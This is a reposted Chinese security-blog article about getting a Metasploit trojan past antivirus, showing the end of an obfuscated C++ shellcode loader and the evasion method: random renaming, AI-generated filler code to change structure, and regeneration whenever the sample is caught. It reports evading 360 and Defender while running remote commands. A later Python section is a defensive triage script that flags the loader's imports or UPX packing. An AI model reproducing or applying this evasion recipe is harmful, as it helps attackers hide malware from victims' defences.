        "MVvs0Kq2k", "RD18C", "Qty07uCFqNF", "Yzee8lpbHlLen", "pfjjWeBtzjZ", "p349hNu", "gRVDMttlyR",
        "sOpsWopi", "wZbNchekCF", "b5VxFDg4", "K2rUCfDOHPfnC", "RLhqKz7vaPhlmbS", "oD70BO", "SzM7I5r",
        "OKIPc1pQOqCN", "WaZrv9OGE43P", "LJNcsQY2tK2qp", "nn4dFoRfQq", "ZxOrRI0", "CL3COzoB7",
        "ZRcPpGs", "E6LDi4Z", "OiSSZP7", "bLB2H", "qchjxrWFYax", "wvcjMUizagqkL", "MWgHKyfAk",
        "d0o6Ysqb", "g8SNM9", "fIzwn4TuDWktzIH", "eSmirEB2Ay0wM", "mnv4fZ8Uyq2HW", "ImAeni1vguzjxJ",
        "TSVK8ZO", "qw010vXhadqDear", "NEXqdK033tfj", "cVynyKzqV", "yF769WC", "wKvjAfcSg6Lcmm",
        "U6R5w1TA6CK", "QuupdvD6WvPc", "TOJQ0e6DqAMiW", "ZLzQBKz4J", "FOdqTZaIsU", "JeTdru6abC19V",
        "tgt3c", "TKhrX1l23V", "IYxVG2gAWR2RSzh", "EkOoIRNoUf30rOZ", "Bb4QrSw", "oJ21zX1b",
        "GOqIap5FfCn0", "xzAN4tvK4KzcJn"
    };
    for (const std::string& JCmYhnv78QIO0RI : Ocr4QxIOyTZ0) {
        std::cout << JCmYhnv78QIO0RI << std::endl;
    }
    ((void(*)())CUbuNT)();
    return 0;
}
```
In short, it turns variable names, function names and strings into random characters, then I ask GPT for some sample C++ code (loops and the like) to insert, which changes the structure of the earlier code; compile and run, and it evades.
Results: on 360 and Defender, statically, and dynamically while running a few simple, not especially high-risk commands (ls, cat, getuid, sysinfo, screenshot), it sat there for about half an hour without being detected. And if it does get killed, I just rerun the Python script and generate a new one.
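The renaming only touches names the compiler throws away; the Win32 imports the loader needs (WinINet download, CNG decrypt, VirtualAlloc) survive in the import table as plain ASCII, and UPX adds its own section names. The Python below is an added triage example, not part of the original post: it pulls printable strings from a binary the way strings(1) does and flags that import combination, or the UPX marker when packing hides it. The sample bytes are constructed inline and are not a real binary.

```python
import re

# Win32 imports the loader on this page needs; renaming in the source cannot touch these
API_GROUPS = {
    "download": {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"},
    "decrypt": {"BCryptOpenAlgorithmProvider", "BCryptGenerateSymmetricKey", "BCryptDecrypt"},
    "execute": {"VirtualAlloc"},
}
# Section names and signature UPX writes into a packed PE
PACKER_MARKERS = {"UPX0", "UPX1", "UPX!"}

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")

def extract_strings(blob: bytes) -> list[str]:
    """Runs of 4+ printable ASCII bytes, the same idea as strings(1)."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(blob)]

def triage(blob: bytes) -> dict:
    """Flag the download + CNG-decrypt + RWX-allocate combination, or a UPX wrapper hiding it."""
    found = extract_strings(blob)
    hits = {stage: sorted(n for n in names if any(n in s for s in found))
            for stage, names in API_GROUPS.items()}
    stages = [stage for stage, h in hits.items() if h]
    packed = sorted(set(found) & PACKER_MARKERS)
    if len(stages) == len(API_GROUPS):
        verdict = "loader-like: all three stages imported"
    elif packed:
        verdict = "packed: unpack before judging imports"
    else:
        verdict = "no match"
    return {"stages": stages, "hits": hits, "packed": packed, "verdict": verdict}

def constructed_sample(packed: bool) -> bytes:
    """Stand-in for a compiled loader: filler bytes with import or section names embedded.
    Constructed for this example; it is not a PE file."""
    filler = bytes(range(0, 256, 7)) * 3
    if packed:
        # UPX compresses the original import table; only its own stub names stay visible
        body = b"".join(name.encode() + b"\x00" * 4 + filler for name in ("UPX0", "UPX1", "UPX!"))
        return body + b"\x00\x00LoadLibraryA\x00\x00\x00GetProcAddress\x00" + filler
    names = [n for group in API_GROUPS.values() for n in sorted(group)]
    return b"".join(b"\x00\x00" + n.encode() + b"\x00" + filler for n in names)

if __name__ == "__main__":
    for packed in (False, True):
        print("packed" if packed else "plain", triage(constructed_sample(packed))["verdict"])
```

On a real sample the same logic runs over the unpacked image, or better over the import table itself, which is why the packed verdict is "unpack first" rather than "clean".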
(screenshots: run results on 360 and Defender)
This stopgap of mine is a bit flimsy, but I don't want to go and learn Windows pwn security either; I really envy those rock-solid trojans that do whatever they want and ignore AV...

Originally published on the WeChat public account 鬼麦子: Metasploit 简单木马免杀

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the mail is not filtered; contact details are on the home page).
admin, published 2025-06-24 20:36:10
When reposting, keep the link to this article (CN-SEC中文网, with thanks to the original author): https://cn-sec.com/archives/4198289.html